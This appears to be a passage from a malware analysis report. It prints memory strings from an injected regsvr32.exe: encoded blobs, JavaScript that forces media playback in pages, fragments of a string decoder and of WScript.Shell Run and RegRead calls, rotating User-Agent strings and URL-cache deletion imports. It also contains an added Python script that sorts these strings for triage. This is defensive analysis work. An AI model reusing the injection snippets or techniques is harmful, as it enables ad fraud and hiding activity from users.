YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 
GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 
YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
c:\%original file name%.exe path<<c:\%original file name%.exe>>path inj_ffile<<:2:>>inj_ffile
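The dump above contains a handful of indicator families that a triage analyst would want to pull out mechanically: the JavaScript one-liners that force playback of every object/embed/video element, the hex/XOR string-decoder fragments, the WScript.Shell Run/RegRead pieces, the IWebBrowser COM interface names, the bundled browser User-Agent strings, the Internet Settings\Zones registry path, and the WinINet request and URL-cache-deletion imports. The script below is an added example and is not part of the Lavasoft report or of the sample itself; the family names, patterns and the User-Agent threshold are this example's own choices, and SAMPLE_DUMP is constructed from lines copied out of the regsvr32.exe dump above.

```python
"""Group strings from a process memory dump into indicator families.

Added example, not part of the Lavasoft report: family names, patterns and
thresholds are this script's own. SAMPLE_DUMP is built from lines copied
out of the regsvr32.exe dump on this page.
"""
import re
from collections import defaultdict

# (family name, pattern); one string may belong to several families.
FAMILIES = [
    # JS that calls play()/playVideo()/start() on every <object>/<embed>/<video>
    ("autoplay_injection", re.compile(
        r"getElementsByTagName\('(?:object|embed|video)'\).*?\.(?:play|playVideo|start)\(\)", re.I)),
    ("autoplay_injection", re.compile(r"jwplayer\(\)\.play\(\)")),
    # fragments of a hex (parseInt(...,16)) / XOR (charCodeAt()^) string decoder
    ("js_string_decoder", re.compile(r"String\.fromCharCode\((?:parseInt\(|$)|charCodeAt\(\)\^")),
    # WScript.Shell automation: process launch and registry reads from script
    ("wscript_shell", re.compile(r'ActiveXObject\("WScript\.Shell"\)|\.Run\("|\.RegRead\("')),
    # COM interfaces used to drive Internet Explorer
    ("browser_com", re.compile(r"^IWebBrowser(?:App|2)?$")),
    # IE security-zone registry path
    ("ie_zone_settings", re.compile(r"Internet Settings\\Zones")),
    # WinINet URL cache enumeration / deletion imports
    ("url_cache_wipe", re.compile(
        r"^(?:Find(?:First|Next)UrlCacheEntryA|FindCloseUrlCache|DeleteUrlCacheEntry)$")),
    # WinINet request imports
    ("wininet_http", re.compile(r"^Http(?:Open|Send)RequestA$")),
    # browser User-Agent strings; several distinct ones in one binary is itself a signal
    ("user_agent", re.compile(r"^Mozilla/\d\.\d \(")),
]

# Constructed sample: lines copied from the regsvr32.exe dump above (one UA per
# browser generation kept, filler strings such as .text included as negatives).
SAMPLE_DUMP = """\
kernel32.dll
wininet.dll
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser2
+=String.fromCharCode(parseInt(
,1).charCodeAt()^
=new ActiveXObject("WScript.Shell");
.Run("
.RegRead("
Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3
HttpSendRequestA
HttpOpenRequestA
FindFirstUrlCacheEntryA
DeleteUrlCacheEntry
.text
"""


def classify(line):
    """Return the set of family names a single dump string matches."""
    return {name for name, pat in FAMILIES if pat.search(line)}


def triage(lines):
    """Bucket strings by family and count distinct User-Agents."""
    hits = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        for fam in classify(line):
            hits[fam].append(line)
    summary = {fam: len(v) for fam, v in hits.items()}
    summary["distinct_user_agents"] = len(set(hits.get("user_agent", [])))
    return dict(hits), summary


def assess(summary, min_user_agents=3):
    """Turn per-family counts into findings; threshold is this example's own."""
    findings = []
    if summary.get("autoplay_injection"):
        findings.append("injects JS that forces playback of object/embed/video elements in loaded pages")
    if summary.get("js_string_decoder"):
        findings.append("carries a hex/XOR string-decoding routine in JS")
    if summary.get("wscript_shell"):
        findings.append("drives WScript.Shell (Run/RegRead) from script")
    if summary.get("browser_com") and summary.get("wininet_http"):
        findings.append("automates Internet Explorer via IWebBrowser2 and issues its own WinINet requests")
    if summary.get("ie_zone_settings"):
        findings.append("references the Internet Settings\\Zones key (IE security zones)")
    if summary.get("url_cache_wipe"):
        findings.append("enumerates and deletes WinINet URL cache entries")
    if summary.get("distinct_user_agents", 0) >= min_user_agents:
        findings.append(f"bundles {summary['distinct_user_agents']} browser User-Agent strings (UA rotation)")
    return findings


def run(text):
    """Triage a whole strings dump given as text; returns (summary, findings)."""
    _hits, summary = triage(text.splitlines())
    return summary, assess(summary)


if __name__ == "__main__":
    summary, findings = run(SAMPLE_DUMP)
    for fam, n in sorted(summary.items()):
        print(f"{fam:22} {n}")
    for f in findings:
        print("-", f)
```

Feed it the output of `strings` on any dump region (`run(open(path).read())`) and compare the per-family counts across the dumps on this page; identical counts for regsvr32.exe_436 and regsvr32.exe_928 are expected here because both regions carry the same injected module.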

regsvr32.exe_928:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R 
